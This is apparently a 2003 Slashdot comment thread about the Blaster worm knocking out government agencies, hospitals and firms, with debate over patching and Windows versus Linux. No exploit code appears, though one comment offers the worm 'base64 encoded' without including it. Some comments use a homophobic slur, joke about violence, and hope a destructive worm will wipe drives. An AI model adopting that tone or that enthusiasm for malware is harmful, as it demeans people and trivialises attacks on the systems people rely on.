Windows Virus Takes Out Gov't Agencies in MD, PA
Zolzar writes "Looks like the Md. State Motor Vehicles Administration is the first government agency reporting a failure of their systems due to the recent virus." This is a more specific story about the outage. And the city of Philadelphia has suffered as well.
Let's prove how insecure everyone already knows Windows is by shutting down government agencies, gee, I am sure the "haxor" would have been really proud of his/her self if he/she proved their point by porking say a hospital's computer system. What an asshole.
I hate sigs.
In Soviet Russia, government agencies take out you!
C'mon, this is getting so old ... but I guess that's the real pity, isn't it? Gives cities like Munich the last laugh.
A feeling of having made the same mistake before: Deja Foobar
Does this mean those chickens are finally coming home to roost?
Quite an experience to live in fear, isn't it? That's what it is to be a slave.
The patches have been available for a LOOOOONG time now. They should have patched. They can't whine now. End of story.
www.sitetronics.com/wordpress
The person who created this worm did so to show that Microsoft's software was insecure. Their methods are bad, but they've shown that no matter how good WinXP sounds compared with Win9.x, it is still made by Microsoft. If you don't want this kind of rubbish, don't use Microsoft.
DSL reports has a security forum that has been taking this sucker apart and giving us the code:
have a look:
http://www.dslreports.com/forum/remark,7649146~
..has been hit too.
You would think that somebody at the MTA would know about the patch, but no.
You still need a competent person to maintain the machines, no matter what software you go with.
Bringing down the DMV may be the best use anyone's ever found for a virus.
It's good to use your head, but not as a battering ram.
We discovered we got hit when our Sonicwall connections hit the limit every 10 minutes. It took us two tries to clean it all up.
And who was it who brought it into the office? The CEO. He thought he had a virus but connected to the network anyway. Mod that funny if you will but try being part of our network support team.
"She's a West Texas girl, just like me" - G.W Bush Iraqis
Good ole, trustworthy, reliable, secure, best OS, Winblows.....how can it still remain on 90%+ of PC's? That should be on unsolved mysteries.....
Looks like viruses like this may help speed adoption of alternate operating systems (like linux, OSX, et al.) on the desktop quicker than a dozen ESR's with geek infantry in tow.
Spoke with both sides of the family this evening, going on about how messed up their computers were acting and all they had to go through to get it patched up. I listened and informed them how well my iBook and the relative merits of UN*X and they listened...
Thanks again, Bill!
Woo hoo! Maybe they'll think more about the systems they run. Same old story, same systems. I'm turning my pager off this week, since I'm on vacation. Besides, I'm the 'nix guy... :)
... Windows Update once every couple weeks.
I know there'll be dozens of "they shouldda been using un*x" posts, but in defense of Windows, there has been a patch for this on Windows Update since July 16. Even I had enough time to test the patch on a non-production system between then and now. Every platform gets its 'sploits throughout its lifetime, it's just a matter of learning about them and applying the proper patches in a reasonable amount of time... especially on mission-critical machines. (DMV computers, etc...)
Are you, by any chance talking about MS Blaster Worm? ... Maybe then the media will get the idea too!
:/
It's good for us to keep using the correct terminology
Ok, time to get modded down.
A radio news report tonight said that a 3M plant in Minnesota shut down Tuesday due to a computer worm. Somebody's trying to run a plant dependent upon Microsoft...
"In Sweden, Internet provider TeliaSonera said about 20,000 of its customers were affected after the infection clogged 40 servers handling Internet traffic.
Among companies affected in Germany was automaker BMW, said spokesman Eckhard Vannieck. He said the problems did not affect production."
Really makes you wonder who ain't sayin...
I can forgive stupid home users, but shouldn't mission critical things like these patch every now and then? The hype surrounding this has been huge, and if you run unpatched microsoft stuff, well, good luck fixing it now. It will take a long time, but at least this worm can be fixed with little damage. Maybe this worm will get people to pay attention to security, but then again people said that about the last dozen MS worms.
STUPID!!
SAILING MISHAP
Sounds like we might need to get Skynet onto this one!
...after NASA Linux systems were taken down by Ramen, a worm based on an exploit patched 5 months before (the vulnerability used by Blaster was patched 1 month ago)
what recent virus? we all don't live and die by the newest norton update, someone tell em what the hell "the recent virus" is.
Their fault-the patch was released over a month ago, before there were any known exploits for it.
when a new Microsoft worm or exploit is out. But after the initial update stuff it all settles. The latest RPC vulnerability the Blaster is already slowing down according to a Cnet.
And I guess that everyone that has some firewalls and uses common sense always survives these attacks. At my company's network we use Win 98 instead, so we were able to escape this worm. Actually it looks like all the new exploits are on these new Win2000 and XP versions, so to me Win 98 or Win Me looks like a much better choice in the security area.
Proud patriot and republican voter.
Here's the entire virus, base64 encoded. Have fun. It floods microsoft.com/windowsupdate.com starting saturday.
Why does the American public - much less the American government - let itself be duped into using insecure, closed-source, and only half-functional software? It's not the money - the government has to stinking pay Bill Gates and crew for the privilege of using his junk. It's not the jobs - there would be other jobs out there (with RedHat, or Apple, or any of a dozen other OS makers) without MS. In fact, there would probably be more IT jobs than there are...
So why do we put up with it? Please, I'd love to hear ideas. I don't know of much of anything that the average bureaucrat, or military office, or CIA spook, or DOT drivers-license-tester can do on Windows/Office systems, that couldn't be done under Linux or FreeBSD. I really would love to know why, when Germany, India, and who knows how many other countries have ditched closed-source software for OSS, we can't do the same...
Any thoughts?
Web Design & Software Development
Interesting. I had noticed when I stopped by Municipal Court to schedule a trial date that the computers were down. I was told by an employee that it was due to the power outage, a comment that didn't make sense considering that I knew for a fact that the server farm was a floor above us...
As pissed as I am at the asshole who wrote the worm (it took nearly half an hour to schedule something that normally takes 2 minutes-- thank "Bob" that I was in Municipal Court, which is only starting to modernize from an old IBM mainframe setup, rather than in Common Pleas or Federal District Court, which are totally computerized-- and in the case of Common Pleas at least, running on Windows), this is, of course, another example of why governments, in the name of security, should go to more open-source solutions.
My wife's entire 1500 plus employee company was instructed today to not turn on their computers until IT came around to look at them. I guess a few computers were infected with this worm and they wanted to ensure things were taken care of. So, here's the deal: I figure that today alone, due to lost productivity, salaries, benefits etc.... this company lost $250k from this worm. So, I ask: When are companies going to wake up and realize that the fundamental foundations that Windows are built on are flawed when it comes to security? There have got to be studies out there examining total cost of ownership of the various platforms. For instance, I spent a couple days of my time updating our remaining Wintel systems to guard against this virus and am soooo happy 95% of my work is done on OS X.
Visit Jonesblog and say hello.
I just want to say LOVE YOU SAN!! billy gates why do you make this possible ? Stop making money and fix your software!!
:)
I read that this morning and smiled, at least these hidden easter egg messages have a bit of humour to them
Of course I wasn't so happy when the workload resumed and I was left with a nice deal to clean up.. but.. thanks for the couple hours of coffee break?
I keep hearing that windows 2k3 is the most secure windows, but (and I'm truly asking), what makes people say so? I'm using it at home. Evidence for: logs changes, logs every reboot and needs you to enter a reason, insists that every site (including google) has a security issue, comes with almost everything disabled, doesn't let users use shockwave et al without permission, probably some bug fixes. Evidence against: see the article above. At least it informed me afterwards that the computer unexpectedly rebooted . . .
PS: Please don't mod me for flaming, I'm really wondering what inner changes there are, other than the ones above that give the impression of security.
A friend who works at blackbox told me "hundreds" of computers shut themselves down at EA Studios out in Burnaby this morning ... HA HA
I mean... who on Earth would expose a Windows machine to the internet...
Troll or not... it seems to be just common sense with 8 years of data to back it up.
One of the downsides to having just one type of OS is that it makes you very vulnerable to this sort of thing.
As far as blaming people who haven't patched their computer, I can't see it. This thing is hitting home dialup users fer crying out loud - my friend had to drive over to his dad's house to disinfect a machine. You can't expect everybody's grandmother to behave as a professional sysadmin.
When they find the Linux users who did this I hope they lock them up and throw away the key.
So all someone has to do is dislike Gates and Microsoft, write a Windows virus, and they are automatically considered a Linux user?
Cool.
The unofficial
If this was a "pro-linux" motivated attack, then surely this troublemaker's attentions would've been best directed at sco.com rather than windowsupdate.com, no?
~
~
~
-- INSERT --
First off, congratulations! Secondly, though, that's just the point: it is a $100 rock. This is what happens when somebody gets a monopoly - De Beers undersold everyone, then jacked the prices to the moon, and nobody bothered to try to stop them until they owned the market. In fact, most of their major execs can't set foot in the U.S. without getting arrested for racketeering, anti-trust violations of all stripes, etc...
Power corrupts; absolute power corrupts absolutely.
Web Design & Software Development
> microsoft rules linux sucks get over it gay linux faggots
Yeah, Linuxers are just jealous because this software won't run on their systems.
Sheesh, evil *and* a jerk. -- Jade
Seriously. Governments and businesses. Every time a pimply faced half-hack writes a new $krYp+ to take down the stand-up comedy act that is Windows Security....
/. knows.
/either/... We also know that *any* poorly adminned box is a deck of cards, but C'mon! look at the vast canyon of difference, just in how installations come out of the box!
/me gets off soapbox again.
"Blame the admins for not patching when patches were available"....
This has some merit, yes. *BUT* has anyone ever adminned a server that must be up 24/7? If you've got a whole room full of them, you just don't have the time to go in and manually apply patches. Yet, automatic Updates pose another problem: You probably just can't have a MSSQL server doing unexpected reboots all the time. You can lose data, what if the patch breaks something? etc.
And even after all the patches and fixes (we're sidestepping the Microsoft "patch one hole, open 3 others" issue for the moment), stuff still happens. Servers get knocked over. Look how many times it's happened in the last 12 months.
For home users, a disabled computer is a bummer, sure. But for businesses and governments, when will they simply decide that "This Just Cannot Happen Anymore."? Seriously. We're talking lives, national security, and huge amounts of money at stake here.
The alternatives are out there. I know, you know, and
We all know that Linux, Solaris, *BSD and the like are not 100% perfect
When will they learn? Seriously! I think it would make better business sense (read: make more money in the long run) to look away from Microsoft and look towards other Free(software) and Commercial products.
Fwiw, when i booted up my WintendoXP box to download the patch, i got nailed before i got to type a URL into the browser!!
C'MON!! AT LEAST GIMME A CHANCE, DAMMIT!!
do() || do_not();
I work in IT for the Department of Transportation in TX. Today, around noon, we suffered state-wide outages. It would have been easy to prevent- we have the tools to automatically deploy patches and updates to every computer on our network. Unfortunately, the people who have the necessary privileges to do so, didn't.
My section was not affected, because I took it upon myself to patch the computers I was responsible for. Hundreds of people in my building were unable to use their computers for half the day. My section had problems because the servers we rely on were infected.
I hope (in vain) that 'little' problems like this will teach system administrators to keep their machines up to date.
Here at Drexel University our lab computers have been affected, and we couldn't access our data properly. The funny thing is that our president (Pappy) today was right outside with three Segways touting our technological prowess, rolling along to Born to be Wild blaring in the background. All the tech in the world doesn't matter if you don't use it right.
..they are an "ordinary asshole," as opposed to an asshole "trying to get people to switch to Linux" ?
The unofficial
A friend of mine spent the entire afternoon patching machines in his department at the university where he works, because their IT guy is on vacation this week. And the entire finance department was sent home for the afternoon while their system was patched up.
I know that the ~3 weeks that the patch for the RPC vulnerability has been out for isn't a huge amount of time to test things, but with a vulnerability of this scale, it's really incumbent upon IT people to get networks patched quickly, and it really reflects poorly on the IT department of any organization that gets hit, if you ask me.
Hello, I believe the RPC vulnerability is a great risk, but let's say that Microsoft had other similar vulnerabilities (IIS?). The big problem here is the users and the sysadmins with a lack of knowledge or the attitude "I believe everything on Norton's site". I remember a few weeks ago, when the RPC vulnerability came out, sites like antivirus.com had it in "Low risk". Another example is the people who work at my school: there are several sysadmins (like 4) and they sent an email about using a firewall, and that will fix the problem. I mean, you need to apply patches... you NEED to deploy fix tools, but no. Maybe it's not government, but come on, you can get a shell with the vulnerability too in a professor's computer, student's paradise? maybe. These misinformed users because of bad admins, it's like virus hoaxes in e-mail...
will they learn? this is our tax money at work. holy crap. we must demand better. can the cost of linux transition really be more than all the windows problems?
My problem? I was perfectly gruntled, until some numbnuts came by and dissed me.
... has already been referring to it as the Windows worm (or virus).
Pretty funny.
That Microsoft update website (the first thing I go to after the rare occasion of me rebooting to my windows partition) was slow as syrup today. It seemed rather odd, but I assumed that it was due to load.
This would certainly eliminate the deplorable labor conditions in the third world, as well as fix the awful problem of homogenous computer environments (i.e. M$ dominated networks).
No, it's bad software compounded by lazy sysadmins...
they got one thing right when they wrote it - Billy Gates why do you make this possible? Stop making money and fix your software!! . yea, it's a huge pain now, but think of it this way - either microsoft realizes it needs to fix its problems and does so, or microsoft dies due to the worm. it's a win-win situation :)
I'm trying to get on Windows Update right now (I was already patched, but, just routine patching -- flame away). It's running really slow... probably because of this virus. hah. sucks to be you
I think my principles are reachin' an all time low
That's impossible... Windows XP is the most secure OS in the world... This is just an illusion...
The 10pm news here in Philly interviewed one of the city's IT guys. He stuttered and stammered his way through the whole thing, and looked to me like a man afraid for his job as he claimed that there was "no warning and no way to be prepared for this"-- not a verbatim quote, but close enough.
I think the guy is right to be afraid for his job-- he's pretty damned incompetent to have not heard about this. This vulnerability was quite publicly announced weeks ago, and Microsoft's page with the patch is dated July 16. Even Homeland Security released a bulletin, and I'd hope that if nothing else those would get around in a city government that is supposed to maintain a level of disaster-preparedness.
Then again, this being Philadelphia, that guy likely got his job through patronage and wasn't qualified for it in the first place.
~Philly
Well then...that must make me a freaking linux genius! :-)
...that I'm a damn programmer, and my system was secured from this exploit (due in large part to my overly paranoid nature), but the workstations belonging to my dept's microcomputer support & network manager were all vulnerable and hit. Dumbasses. I spent my entire morning troubleshooting, patching, and fixing the workstations belonging to my office's higher-ups & executives (I was specifically requested by them, I might add), while the network & micro fucktards ran around fixing the computers of the no-counts. Needless to say, I pissed off a lot of people today, but thank God they aren't the ones who sign my check.
I look at the never ending laziness of network support as continuing to supply me with the opportunities to secure my employment. Also, the thank you email from the prez really gave me a chubby.
Spread the RC luvin'
Is it just me, but AFAIK this was NOT a part of Windows update
It seems you have to go to
http://www.windows.com/downloads/
to download the patches
On another note I have had 2 Windows installations die in the last 2 weeks after failed Windows updates
What a POS OS!
If something like Lycoris were on 95% of computers out there, where everyone runs as root, maybe some more sploits WOULD occur.
However, assuming that the damned distros that made it onto 95% of computers out there were just secure out of the box (eg. you don't need any damned services running by default as a desktop user, there's no reason for this vulnerability on Windows!) then this would never happen on Linux, or any other Unix for that matter.
Also, this is not a virus, it's a worm. Viruses have been shown to be pretty much harmless on Linux, because of the fact that they would have to have exploits and such things coded into them to be really really effective. Linux worms have been exceedingly rare anyway, compared to Windows.
-toomuchPerl
Yeah, we've surely seen to what extent microsoft rules... Personally I run linux, and couldn't care less for the losers running windows...except for the fact that their fucking OS has managed to clog down the entire internet. High five to BillG. Even when running a proper OS, I have to deal with the effects of lamers running windows in their parents basement
I honestly don't mean to be nasty about this, but the entire open/free community really needs to understand mainstream and business users far better than they do if Linux has any hope of making serious gains in those areas beyond the small server market.
And I know this for a fact. I had a machine that I re-loaded XP on for a customer since he was upgrading his motherboard. Friday I finish the windows load and I install all the patches available on the update page. Ran it once to get the first 80Mb of patches, ran it to get Media Player 9, ran it again to get the security patch for Media Player 9.
That's everything on the update page.
Installed Norton AV 2003 and got all the updates available as of last Friday. After doing that one would have a reasonable expectation of being safe against a problem, especially since the problem was discovered a full month ago.
Monday the customer called with the machine giving a 60 second countdown and rebooting.
Now even if the people at the MVA and other places *did* the updates from the updates page, they'd still be screwed.
All I want is these virus programmers, their fingers, a ball-peen hammer and 5 minutes...it's all the time I'd need
-- Wiccan Army, 13th Airborne Division "We will not fly silently into the night"
you change the paper and toner in the LaserJets.
Wanna-be BOFH types are funny.
My bad. I made a bad link that wasn't what I wanted.
If you wanna look at the code it's HERE:
http://www.dslreports.com/forum/remark,7652257~
The grain of salt is that they are reverse engineering. But it still is there and interesting.
Again my apologies.
I am going to have to agree with those who disapprove of the 'haxor' who designed this virus...knocking the MVA out might not be such a big deal but it has infected the computers of at least one police agency. Any messing around with the computers of a police agency can cause safety and property to be put into danger. NOT cool.
Comcast as a whole got blasted, not surprising.
A win2k sp3 machine I patched has something like 16 critical updates needed. Several reboots.
That's too much downtime. You can update just about everything but the kernel in linux/bsd without a reboot. Going through this every couple of days is a drag!
The architecture is fundamentally broken: the enabling stuff by default; implementing dozens of new ways for strangers to do things to your computer without your knowledge (as features!) with each release; welding mere applications (web browser, email client) to the OS, having them run with system privileges, and making it impossible to remove...
Finally - windows update is fundamentally broken. It will report success when the patching operation fails. This is one way:
http://www.ntbugtraq.com/default.asp?pid=36
They need to start over. Maybe if they start clean they can come up with something that compares to Linux.
I'm surprised that no one's called it; The Master Blaster Worm. :)
I fail to see how issues like this show that windows is fundamentally insecure.
- The patch came out a month ago.
- They have 90% of the marketshare, so one would assume that 90% of the viruses created are written to target exploits on Windows.
- They have 90% of the marketshare, so one would assume that people who spend their time looking for security holes will spend 90% looking at Windows.
If Linux had 90% marketshare and was used mostly by people who don't patch, like Windows is, I fail to see how architecturally Linux would be more immune to this type of attack than Windows is. The reason this doesn't happen with Linux is not because it's oh so superior to Windows software wise but because it's used by less people (less rate of infection, less motivation for hackers to write viruses), and the people who use it are competent enough with computers to make sure their stuff is patched and healthy.
The people who run Linux at home or in the office didn't get this virus because their Windows machines were patched. Why do you think that is?
--
> And who was it who brought it into the office? The CEO
Sure maybe they didn't patch, sure they connected their system to the local network.
There are a few common sense notions that people rightfully have. Among these are that 1) you can be on the internet and 2) connecting your system to a network should not harm other computers. If theory and practice are incompatible, I think they should rethink the practice of computers rather than the above two notions.
"In theory, practice and theory should be the same, but in practice they're not."
The fact is, there is no 'secure' operating system, but there are enough things that can be done to prevent virus infections that any large company stricken by this virus should fire their IT staff TODAY.
What company does NOT demand auto updating anti-virus software on every system connecting to their corporate network? What company does not have a person in charge of installing MS patches within 24-48 hours of their availability? Don't give me that crap about being afraid of the patches, because if they damage your network, you can blame Microsoft and save your fucking job.
Viruses are a reality for Windows networks, and companies without policies and recovery plans to deal with them should fire their staffs and get competent people in place. Businesses need to understand that competency costs MONEY, so if your IT people are paid dirt wages, your network is a sitting duck, trust me. Can your MCSE who can't tell you what circular logging does on an Exchange installation. Fire the fool who told you to build trusts between multiple AD forests, I don't care how reasonable his explanation was. I see this shit every day, because 80% of Windows admins suck monkey dick. Microsoft is on their 3rd round of creating a certification program. Maybe they should consider taking the aftermarket PROFIT out of it, and stop caring about pass/fail rates long enough to get a core group of people who know what the fuck they are doing?
There is no excuse for this shit anymore. A virus attack on a company running Windows these days should mean an instant termination of the staff that let it happen.
I guess it's time to offer my services to all those companies who have flower arranger paper MCSE's who are getting fired tomorrow :)
You're putting it like it was an intentional attack on these institutions by a hacker, but really, it wasn't a hack, it was a virus, which should, more or less, indiscriminately deal damage. It was probably not the intention of the virus' author to infect nothing but government institutions.
And you thought the wait in line at the DMV was long before... I feel sorry for the people there today!
Someone posted to "Full-Disclosure" this afternoon asking for opinions about whether a future virus really WILL delete all hard drives, or do something truly dastardly AFTER passing itself on?
Personally I think this is what it'll take before the average user starts to have a clue they are running an OS that opens their machine to hackers and kiddies around the world. A full delete would open a few minds perhaps...very few users seem to realize reasons to back up, protect their passwords.....all the things that admins worry about on a daily basis....
Everyone who was affected by this latest virus should actually thank the author that they were infected, noticed, and patched.....next time might be truly serious....
let's hope and pray!
A common thread in many of the reports is the unwillingness, or inability, of many organizations to spend an adequate amount of money on systems administration and security. How many organizations take a "If it's not broken, don't fix it" approach to dealing with computer systems? Some organizations appear to think that an anti-virus package is the silver bullet for the problem, and don't understand why their computers were affected. Others rely on outside contractors or consultants to fix problems after they have occurred. I've worked in many places where there were no full-time systems administrators. Management depended on local PC "gurus", whose primary job was something else, to keep things running.
Mea navis aericumbens anguillis abundat
This is the factor no one talks about in the endless streams of cost comparisons between Linux and Windows: What does it cost a real-world installation to convert their entire suite of apps and data from one environment to the other, including retraining personnel.
For some applications, like vertical markets (e.g. cash registers) this is not a big issue--all the conversion happens behind the scenes and you're not dependent on a slew of other apps. But for a typical office environment you have a huge investment in software, some of it purchased, some of it developed in house (and in some of those cases they don't even have the source any more). For many businesses and individuals there's literally no acceptable way to get from their current environment to a Linux-based one that does the exact same things. So they stick with Windows, and they bitch like crazy about it to people like me.
Maintaining this crap is taking way too much fsking time. I have a lot of other projects that I could advance but instead I get to hit slashdot while watching patch progress bars randomly increment.
This is not good, it's not acceptable, and I am moving toward not accepting it. Screw em. Lousy products, massively offensive licensing terms (both in dollar amount and provisions), and smarmy, arrogant execs. Piss on them.
Here in Columbus, OH, the BMV is down, along with the patient tracking/data services at several major hospitals. Apparently St. Ann's has closed to incoming traffic because they don't have a paper fallback system. Oops.
Parent is the victim of moderators who did not even bother to look at the link. Clearly, the parent is not a troll, but an attempt to be funny. Mark the moderation as unfair.
If I'm not going to get karma, I'll stand up for those who should (or at the very least not lose any).
And as a person that works for a multi-billion dollar corporation, let me tell you that Microsoft's market share will not remain what it is unless they seriously change the way they do things.
I just want to say LOVE YOU SAN!! billy gates why do you make this possible ? Stop making money and fix your software!!
Love,
Letter
This virus messed up the American Express network hardcore.
The majority of MS worms are created by little nerds in basements using pirated copies of Visual Studio. Not Linux users. They are known as script kiddies and are all over Usenet sharing their windows expertise.
So bullshit to your post.
OH THE SHAME I fell off the wagon and use sigs again!
My mother works for a hospital. (I'm not going to say which one.) It seems that the crappy IT girl (My mom's nemesis. I'm serious here they hate each other. :]) there didn't manage to get the system patched in time.
While most critical systems (read life support) were not affected, some other systems (read the software that is used by medical records) were affected.
This means that reports, some of which diagnose serious diseases, are unable to be delivered to the patients that need to know about them.
I have a lot of other projects that I could advance but instead I get to hit slashdot while watching patch progress bars randomly increment.
And what exactly is downloading stuff preventing you from doing? If you can surf Slashdot, you can write or program or e-mail or do whatever else you need to do.
You think there's another OS out there that's easier to maintain? Macs, maybe, but even Macs have large updates every month or two.
My department's network consists almost entirely of win2k boxes with the odd 9x client at some of the less well funded sites. We've got a dozen 2k servers and roughly 300 workstations, the vast majority of which were patched, and a restrictive firewall. Today we got hit by a worm for the first time, from another county department (behind the firewall), and from a dial-in client at a charity who uses one of our databases. I blocked port 135 from the rest of the county and terminated that dialin client, and started checking out the few boxes we knew hadn't been patched yet. I want to stress that the worm that hit us was not the MSBlast thing everyone's talking about. It doesn't shut down the machine (although it seems to crash the RPC service ~50% of the time). It's not detected by Trend's newest definitions (that include msblast), or by Symantec's msblast remover tool. Whatever it was, it did a number on those workstations and we left them unplugged from the network pending figuring out what the hell is wrong with them.
It seems to spread the same way, scanning network ranges (apparently at random - when the dialin client finished scanning our block it went on to start scanning 5.69.something) on port 135 and attempting to infect any it hit. One thing to note is that it crashed the RPC service on a couple of fully patched clients, but for most of them it had no effect. On the ones that it did infect (IE, the ones that weren't patched), it disabled file copying through the GUI (both drag&drop and copy&paste). It also disables a number of odd things, mostly dialogs, like IE's "Find (on this page)". Between those two I suspect it infected at least one system DLL. Something it did didn't agree with Word, which would pop up an error on creating a new document, saying that the document could not be registered, so other documents would not be able to link to this one. I didn't spend too much time on it (There were only a few unpatched boxes, we took them offline and went home), but I didn't find any reference anywhere to this. It wasn't scanning out from the infected machines, so it may have a time delay or something built in.
So, first, the people in the story weren't the first government agency to be affected, by far (although none of our public services were affected AFAIK). And second, has anyone else seen a second RPC worm going around? Or is this some mutated version of msblast?
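The scanning behaviour described in the comment above (one internal host walking address ranges on TCP port 135) is easy to spot in firewall connection logs. The sketch below is an added example, not part of the original thread; the log format, addresses, window and threshold are all constructed assumptions.

```python
"""Flag hosts sweeping TCP/135 across many destinations in firewall logs."""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed (constructed) log format, not that of any particular firewall:
# 2003-08-12T19:30:01 DENY TCP 10.1.4.23:1045 -> 10.1.7.1:135
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ALLOW|DENY) TCP "
    r"(?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse(line):
    """Return a record dict, or None for lines that do not parse cleanly."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    try:
        return {
            "ts": datetime.fromisoformat(m["ts"]),
            "src": ipaddress.IPv4Address(m["src"]),
            "dst": ipaddress.IPv4Address(m["dst"]),
            "dport": int(m["dport"]),
        }
    except ValueError:  # bad timestamp or impossible address
        return None


def longest_run(addrs):
    """Length of the longest run of numerically consecutive addresses."""
    best = run = 0
    prev = None
    for a in sorted(addrs):
        run = run + 1 if prev is not None and a == prev + 1 else 1
        best = max(best, run)
        prev = a
    return best


def find_sweepers(lines, port=135, window=timedelta(seconds=60), min_targets=10):
    """Map each source that hit >= min_targets distinct hosts on `port`
    within any `window` to a summary of its busiest window."""
    events = defaultdict(list)  # src -> [(timestamp, dst as int)]
    for line in lines:
        rec = parse(line)
        if rec is None or rec["dport"] != port:
            continue
        events[rec["src"]].append((rec["ts"], int(rec["dst"])))

    findings = {}
    for src, evs in events.items():
        evs.sort()
        best, start = set(), 0
        for end in range(len(evs)):
            # Slide the left edge so the window never exceeds `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            targets = {dst for _, dst in evs[start:end + 1]}
            if len(targets) > len(best):
                best = targets
        if len(best) >= min_targets:
            findings[str(src)] = {
                "distinct_targets": len(best),
                # A long sequential run suggests a range walk, not real RPC use.
                "longest_sequential_run": longest_run(best),
            }
    return findings


def sample_log():
    """Constructed sample traffic: one sweeper, one normal RPC client,
    one busy web client, and one unparseable line."""
    base = datetime(2003, 8, 12, 19, 30, 0)
    lines = []
    for i in range(20):  # sweeper: 20 neighbours on 135, one per second
        ts = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{ts} DENY TCP 10.1.4.23:{1045 + i} -> 10.1.7.{i + 1}:135")
    for i in range(5):  # normal client: same server on 135 every time
        ts = (base + timedelta(seconds=10 * i)).isoformat()
        lines.append(f"{ts} ALLOW TCP 10.1.4.50:{2000 + i} -> 10.1.2.10:135")
    for i in range(15):  # many destinations, but port 80: ignored
        ts = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{ts} ALLOW TCP 10.1.4.60:{3000 + i} -> 192.0.2.{i + 1}:80")
    lines.append("garbled line that does not parse")
    return lines


if __name__ == "__main__":
    for host, info in find_sweepers(sample_log()).items():
        print(host, info)
```

Counting distinct destinations rather than raw connections keeps a workstation that talks to one server over RPC all day from being flagged.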
Just wait till next week, when one with a destructive payload is released...
I'm actually glad this particular worm hit, and not something much nastier - think of it as warning shot, if you will...
smash.
I run: Windows, OS X, Linux, FreeBSD. Just because you have a hammer, doesn't mean everything is a nail.
Not to come off like a MS apologist, but do people here honestly think Linux is the magic bullet to rid the world of worms like this?
Think about it. If an incompetent admin isn't wise enough to keep up to date with MS patches, do you think he'll be able to properly administer and secure a Linux box? How hard is it for these guys to either get a decent firewall, or click start>windows update?
You can't really blame MS for this one, they had the patch out a while ago. The problem rests solely with lazy and/or incompetent admins.
As far as home users go, if they can't figure out Windows, why would they bother with linux?
It wasn't a fucking virus, IT WAS A FUCKING WORM!
News for Nerds...you should fucking know better!
If only someone would have alerted the sysadmins of the world about this RPC problem, back when it mattered, like in July, around the middle, like the 16th -- then maybe the robots wouldn't have taken over the world.
"Sig free in '03!"
It's like digging a hole in the water. (In this metaphor, the water is NOT frozen, 'kay?)
We IT gnomes have other things to do than patch and patch and patch and patch. We can't trust Windows Update to even correctly report the status of the application of a patch. We have users screaming for new installations, new hardware, new software, new networks, wireless, email, etc. Staffing doesn't get determined by workload. Not in my world.
I recently took a contract job to bring the IT operations of a local, growing business from a mom & pop deal to a more enterprise ready footing.
I have about 25 XP/98 machines to look after, but only 2 of them laptops (3 if I count my own). First thing I did when I was hired was grab both of the laptops and patch the hell out of them. Next was the 2K server, and lastly today I spent the whole day running around updating everything I could on the rest of the desktops. No programs got hosed in the update process either, which was a relief. We're behind a small NAT engine too, so I feel rather confident that we'll weather the storm.
My point is that businesses such as my current customer have no clue that an operating system (indeed, almost any program as well) needs to be taken care of. This is the issue that will keep biting Microsoft in the ass - until they make it plain as day that "You need to do regular maintenance to our products" people will run with security holes. If they can't see that it's broken, why would they fix it?
Another point - I'm looking into SUS so I don't have to worry nearly as much (or spend so much time waiting for WindowsUpdate) but I'll need another server to use it. The lone server my customer has is almost overloaded at the moment, running SBS with 256M of RAM. SUS requires 2k Server or above to run - why, I don't know. Just like Microsoft to turn a problem they've created into a marketing opportunity. No wonder they're having trouble stemming the Linux tide.
Soko
"Depression is merely anger without enthusiasm." - Anonymous
How could one already be infected if their computer hasn't been running? Maybe he's implying "as soon as you turn on your computer you'll be infected", I don't know.
Millions of unprotected personal computers remain vulnerable to the worm, which can infect any machine connected to the Internet, experts said Tuesday.
Really? I thought it was only Win2k, XP, and 03, not every computer on the planet. But experts said so, so I guess it must be true.
The worm attacks computers through a flaw in the part of Windows that allows computers to share files and control Internet traffic. Four versions of Windows operating systems are targeted: Windows NT, Windows 2000, Windows XP and Windows Server 2003.
Oh you are aware it doesn't affect every computer on the planet. That's good because five paragraphs before you said it did and now you're contradicting yourself. Wonderful
"This is certainly a capable person who did this," Sundwall said. "In most cases, it takes about six to nine months for a worm to appear after a patch is released. This is certainly something that did occur quicker than we are accustomed to."
Because it is just so hard to create a self replicating buffer overflow program. It's not like this is down to a science. The statement implies a team of developers would have to sit down for a year to create something this "sophisticated". It couldn't be that MS products are inherently insecure and easily exploitable. There are thousands if not millions of people "capable" of this, just not immature enough.
You'll notice some of my excerpts are quotes from within the article, and not necessarily the words of the author. The author still chose to include this malformed crap.
I would recommend seeing this older Slashdot article concerning the worm or going to google to find better written information on the matter. The facts within the new article are interesting, but so blatantly misrepresented it's annoying and I would view an alternative source.
Beware blue cats moving at
Look! The virus is spreading Windows FUD!
Until they can release an OS that goes a couple of weeks between major vulnerability discoveries, they're fucked! And so are you. Don't you think IT staffs have other responsibilities? Do you realize how many updates there have been this year? How many of them require a reboot?
That's an easy question to answer.
The more interesting question is how many of them would not be required if they had implemented a sensible architecture, if they hadn't bolted on a bunch of crap to advance the monopoly into the internet, etc. Then we could hope for a massive improvement in code quality. My impression is that a bunch of this was avoidable, but for lazy and incompetent product managers and programmers, and perverse design goals intended to hurt competitors no matter what collateral damage to consumers.
No, really. List your choice of replacement system and give a thorough list of past remote exploits for it before you bash Microsoft.
Microsoft actually seems to be getting better about security. They still have holes that you have to patch, but so does everybody. Here's a list of the security updates for my OS distribution of choice, for instance:
Red Hat Linux 9 Security Advisories
Most of these aren't as bad as the recent Windows hole (and many aren't in software that even has an equivalent included with Windows), but there have been a lot of them recently, and they're not Red Hat specific problems either.
> > When they find the Linux users who did this I hope they lock them up and throw away the key.
> So all someone has to do is dislike Gates and Microsoft, write a Windows virus, and they are automatically considered a Linux user? Cool.
So that's why the media is reporting Linux usage is up! I thought there were actually more people using it.
When we hear about all those cities and countries considering a switch to Linux, are they actually just considering switching all their jobs over to "Windows virus writer"?
Sheesh, evil *and* a jerk. -- Jade
Saving money shouldn't be the primary focus of adopting public-license software, at least not for governments. They have an obligation to keep public data public, in the strongest sense of the word, and by forcing people to use vendor-specific products to interact with public data, they're sacrificing accessibility for expediency.
Certainly adopting handicapped accessibility laws requiring building construction costs in most government buildings didn't 'save' any money. They passed that because there was a moral, if not legal, obligation to provide access, mostly irrespective of cost.
creation science book
